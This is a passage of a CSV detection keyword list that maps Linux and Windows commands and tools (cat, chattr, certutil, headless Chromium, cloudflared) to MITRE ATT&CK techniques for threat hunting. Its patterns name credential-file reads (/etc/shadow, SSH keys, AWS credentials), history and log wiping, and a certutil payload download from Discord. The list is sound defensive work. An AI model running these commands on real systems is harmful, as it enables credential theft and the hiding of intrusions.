*.atftp_history*",".{0,1000}cat\s.{0,1000}\.atftp_history.{0,1000}","greyware_tool_keyword","cat","show atftp history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A" "*cat *.atftp_history*",".{0,1000}cat\s.{0,1000}\.atftp_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - 
T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*cat *.bash_history*",".{0,1000}cat\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","cat","show bash history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A" "*cat *.bash_history*",".{0,1000}cat\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*cat *.mysql_history*",".{0,1000}cat\s.{0,1000}\.mysql_history.{0,1000}","greyware_tool_keyword","cat","show mysql history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A" "*cat *.mysql_history*",".{0,1000}cat\s.{0,1000}\.mysql_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*cat *.nano_history*",".{0,1000}cat\s.{0,1000}\.nano_history.{0,1000}","greyware_tool_keyword","cat","show nano history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A" "*cat *.nano_history*",".{0,1000}cat\s.{0,1000}\.nano_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - 
T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*cat *.php_history*",".{0,1000}cat\s.{0,1000}\.php_history.{0,1000}","greyware_tool_keyword","cat","show php history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A" "*cat *.php_history*",".{0,1000}cat\s.{0,1000}\.php_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*cat *.zsh_history*",".{0,1000}cat\s.{0,1000}\.zsh_history.{0,1000}","greyware_tool_keyword","cat","show zsh history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A" "*cat *.zsh_history*",".{0,1000}cat\s.{0,1000}\.zsh_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cat *bash-history*",".{0,1000}cat\s.{0,1000}bash\-history.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cat /dev/null > $HISTFILE*",".{0,1000}cat\s\/dev\/null\s\>\s\$HISTFILE.{0,1000}","greyware_tool_keyword","cat","deleting bash 
history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*cat /dev/null > /var/log/*.log*",".{0,1000}cat\s\/dev\/null\s\>\s\/var\/log\/.{0,1000}\.log.{0,1000}","greyware_tool_keyword","cat","deleting log files","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*cat /dev/null > /var/log/auth.log*",".{0,1000}cat\s\/dev\/null\s\>\s\/var\/log\/auth\.log.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cat /dev/null > ~/.bash_history*",".{0,1000}cat\s\/dev\/null\s\>\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cat /etc/passwd*",".{0,1000}cat\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of 
false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cat /etc/shadow*",".{0,1000}cat\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cat /etc/sudoers*",".{0,1000}cat\s\/etc\/sudoers.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cat /root/.aws/credentials*",".{0,1000}cat\s\/root\/\.aws\/credentials.{0,1000}","greyware_tool_keyword","cat","cat suspicious commands","T1003 - T1552","TA0006 - TA0007 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*cat /root/.ssh/id_rsa*",".{0,1000}cat\s\/root\/\.ssh\/id_rsa.{0,1000}","greyware_tool_keyword","cat","cat suspicious commands","T1003 - T1552","TA0006 - TA0007 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*https://files.catbox.moe/*","https:\/\/files\.catbox\.moe\/[^\s\n]+","greyware_tool_keyword","catbox.moe","The cutest free file host you've ever seen - abused by threat actors","T1560.001 - T1190 - T1102 - T1027.002","TA0001 - TA0005 - TA0042","N/A","N/A","Collection","https://files[.]catbox.moe","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*certutil.exe 
-urlcache -split -f *https://cdn.discordapp.com/attachments/*",".{0,1000}certutil\.exe\s\-urlcache\s\-split\s\-f\s.{0,1000}https\:\/\/cdn\.discordapp\.com\/attachments\/.{0,1000}","greyware_tool_keyword","certutil","LOLBAS execution - downloading payload from discord with certutil","T1105 - T1218.010 - T1071.001 - T1036.005","TA0009 - TA0002 - TA0005","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*chattr +i $HISTFILE*",".{0,1000}chattr\s\+i\s\$HISTFILE.{0,1000}","greyware_tool_keyword","chattr","lock out the ability to update the file","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*chattr +i *.bash_history*",".{0,1000}chattr\s\+i\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","chattr","lock out the ability to update the file","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*chattr -ia */etc/passwd*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/passwd.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensitive files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*chattr -ia */etc/shadow*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/shadow.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensitive files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*chattr -ia */etc/sudoers*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/sudoers.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensitive files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*cmd.exe /c chcp 
>&2*",".{0,1000}cmd\.exe\s\/c\schcp\s\>\&2.{0,1000}","greyware_tool_keyword","chcp","chcp displays the number of the active console code page","T1059 - T1027","TA0002 - TA0009","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*brave* --headless * --dump-dom http*",".{0,1000}brave.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A" "*brave.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}brave\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. 
This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A" "*chrome* --headless * --dump-dom http*",".{0,1000}chrome.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A" "*chrome.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}chrome\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. 
This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A" "*msedge* --headless * --dump-dom http*",".{0,1000}msedge.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A" "*msedge* --headless --disable-gpu --remote-debugging-port=*",".{0,1000}msedge.{0,1000}\s\-\-headless\s\-\-disable\-gpu\s\-\-remote\-debugging\-port\=.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*msedge.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}msedge\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. 
This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A" "*opera* --headless * --dump-dom http*",".{0,1000}opera.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A" "*opera.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}opera\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. 
This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A" "*vivaldi* --headless * --dump-dom http*",".{0,1000}vivaldi.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A" "*vivaldi.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}vivaldi\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. 
This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A" "*%SystemRoot%\\MEMORY.DMP*",".{0,1000}\%SystemRoot\%\\\\MEMORY\.DMP.{0,1000}","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","195","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*C:\Windows\MEMORY.DMP*",".{0,1000}C\:\\Windows\\MEMORY\.DMP.{0,1000}","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","195","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*pcienlhnoficegnepejpfiklggkioccm*",".{0,1000}pcienlhnoficegnepejpfiklggkioccm.{0,1000}","greyware_tool_keyword","Cloud VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*._tcp.argotunnel.com*",".{0,1000}\._tcp\.argotunnel\.com.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal 
- Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*.v2.argotunnel.com*",".{0,1000}\.v2\.argotunnel\.com.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*/cloudflared.git*",".{0,1000}\/cloudflared\.git.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*/cloudflared/tunnel/*",".{0,1000}\/cloudflared\/tunnel\/.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*/cloudflared-linux-*.deb*",".{0,1000}\/cloudflared\-linux\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - 
Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*/cloudflared-linux-*.rpm*",".{0,1000}\/cloudflared\-linux\-.{0,1000}\.rpm.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*/usr/local/bin/cloudflared tunnel*",".{0,1000}\/usr\/local\/bin\/cloudflared\stunnel.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*\cloudflared.exe*",".{0,1000}\\cloudflared\.exe.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*\cloudflared\cmd\*",".{0,1000}\\cloudflared\\cmd\\.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal 
- Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*\cloudflared-2023.*",".{0,1000}\\cloudflared\-2023\..{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*\cloudflared-2024.*",".{0,1000}\\cloudflared\-2024\..{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*07b95428cfb9cb49c2447c2ff9fbc503225d5de7ff70c643f45399fc2f08c48c*",".{0,1000}07b95428cfb9cb49c2447c2ff9fbc503225d5de7ff70c643f45399fc2f08c48c.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*0b917a040f43b5b120a3288f76e857203cc52f51c2f78c997d4d0c2da3d0c0c5*",".{0,1000}0b917a040f43b5b120a3288f76e857203cc52f51c2f78c997d4d0c2da3d0c0c5.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a 
tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*0ec73349570f7d8546b9ddfd6b0b409cd622abc133be641bb2a414a2d2b9a21e*",".{0,1000}0ec73349570f7d8546b9ddfd6b0b409cd622abc133be641bb2a414a2d2b9a21e.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*17fa4fd9db3006f9aa649b0160770ebb9e9b8a599f6fb5afce83a16a7cb41bdd*",".{0,1000}17fa4fd9db3006f9aa649b0160770ebb9e9b8a599f6fb5afce83a16a7cb41bdd.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*1b3e09c31048ec7f2ef06166eb47dcdf0e563ca07b6dcc1318fa6f7db3feb458*",".{0,1000}1b3e09c31048ec7f2ef06166eb47dcdf0e563ca07b6dcc1318fa6f7db3feb458.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered 
Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29*",".{0,1000}2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*33c9fa0bbaca1c4af7cf7c6016cda366612f497d08edd017bced7c617baa7fc2*",".{0,1000}33c9fa0bbaca1c4af7cf7c6016cda366612f497d08edd017bced7c617baa7fc2.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*33e6876bd55c2db13a931cf812feb9cb17c071ab45d3b50c588642b022693cdc*",".{0,1000}33e6876bd55c2db13a931cf812feb9cb17c071ab45d3b50c588642b022693cdc.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" 
"*55c11ee0078d85ed35d7df237458e40b6ad687f46fc78b1886f30c197e1683c1*",".{0,1000}55c11ee0078d85ed35d7df237458e40b6ad687f46fc78b1886f30c197e1683c1.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z" "*561304bd23f13aa9185257fb0f055e8790dc64e8cf95287e2bfc9fec160eecf8*",".{0,1000}561304bd23f13aa9185257fb0f055e8790dc64e8cf95287e2bfc9fec160eecf8.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered 